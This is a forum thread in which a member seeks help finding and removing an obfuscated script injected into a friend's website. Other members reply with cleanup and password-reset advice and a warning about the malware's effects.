Results 1 to 8 of 8

Thread: Malware detected on website, need to remove

  1. #1
    Member
    Join Date
    Jan 2008
    Posts
    30

    Malware detected on website, need to remove

    My friends website seems to have malware on it, however, I am unsure exactly how to remove it. They are using a javascript which reads from another infected site, and this in turn loads the malware. the function seems to be obfuscated in some way. Also, this javascript is present on any page which I view on the website. Sorry for vague details, but the function starts like this

    Code:
    <!-- Google analitics BEGIN -->
    
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    After which there is a large section which doesnt make any sense. The main thing is actually finding exactly where they've inserted the function, as its not just inserted simply on index.php. If someone very trusted is willing to help me out, I can discuss more in private.

  2. #2
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    My friends website seems to have malware on it, however, I am unsure exactly how to remove it.
    Why bother?..........................until you have found and fixed the site's vulnerability you are just wasting your time IMO. It would be a bit like banging your head against a wall and taking aspirin because you have a headache?

    You should be able to recover from an uninfected backup? but it will still come back because you are obviously vulnerable?

    For anyone to really help you they will need to visit the site and have a look. I would ask anyone interested to PM shad0w7 to get the relevant information..............thanks

  3. #3
    Member
    Join Date
    Jan 2008
    Posts
    30
    Thats not really a problem, because we know how we got hacked, the admin was keylogged... Passwords have been changed,etc, but we still have this problem. Please if anyone is willing to have a look through the code and figure out where its hidden then pm me.

  4. #4
    HYBR|D
    Guest
    Send me a PM, i'd be happy to spend a lil time checking it out, the Moderator's here can verify i'm trust worthy.

  5. #5
    HYBR|D
    Guest
    edit , actually tell your friend to change the admin password on he's hosting cpanel on a different machine, also tell him to check all FTP accounts and change there' passwords and lock down permission settings on them.

    Now he will need to browse he's file manager in he's cpanel account, and manually right click and edit on each file located in the file manager hunder public_html submenu. he will find that every file will have an iframe with the javascript that calls the malware for a drive by install when users visit the website.

    also manually check the chmod permissions on each file and correct as necessary.

    Personally i would just delete everything in the file manager and up-load a backup that isn't tainted.

    in the future don't download programs etc from bittorent and randomly open suspicious programs etc, and keep your firewall and anti virrii defintions upto date and to regular scans.

    I could link you to the actual malware but meh i'd prob get banned for infecting n00bs. do'h

  6. #6
    Member
    Join Date
    Jan 2008
    Posts
    30
    The problem is the main owner is away, and we cant get contact with him, so we only have FTP access for now. Also, it is not manually inserted in every page, we have checked. It is somehow inserted in some important function which is called by every page in its source. I will pm you a few details.

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    BE CAREFUL FOLKS.................THIS MALWARE IS MALICIOUS!

    It appears to flash your BIOS and leave you with a brick! but it doesn't recognise dual BIOS MoBos...............and I did use a pretty cool ARV to go look...........none of the antimalware saw anything!


    shad0w7, I don't know what country you are in mate, but if it is the USA then take the site down and report the problem to the local (State) CIB, the FBI and the Secret Service. Whoever did that is looking at 5 years minimum it is a felony offense

  8. #8
    Only african to own a PC! Cider's Avatar
    Join Date
    Jun 2003
    Location
    Israel
    Posts
    1,683
    Very Interesting
    The world is a dangerous place to live; not because of the people who are evil, but because of the people who don't do anything about it.
    Albert Einstein

Similar Threads

  1. Windows Error Messages
    By cheyenne1212 in forum Miscellaneous Security Discussions
    Replies: 7
    Last Post: February 1st, 2012, 02:51 PM
  2. Website Administration
    By jethro in forum The Security Tutorials Forum
    Replies: 4
    Last Post: August 9th, 2006, 10:13 AM
  3. Website to website malware scanning
    By Aspman in forum Spyware / Adware
    Replies: 20
    Last Post: November 21st, 2005, 09:07 AM
  4. remove a website from the computer
    By thing0 in forum Tech Humor
    Replies: 1
    Last Post: April 15th, 2004, 06:22 PM
  5. LOVEGATE_J on the rise
    By thehorse13 in forum AntiVirus Discussions
    Replies: 3
    Last Post: May 23rd, 2003, 01:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •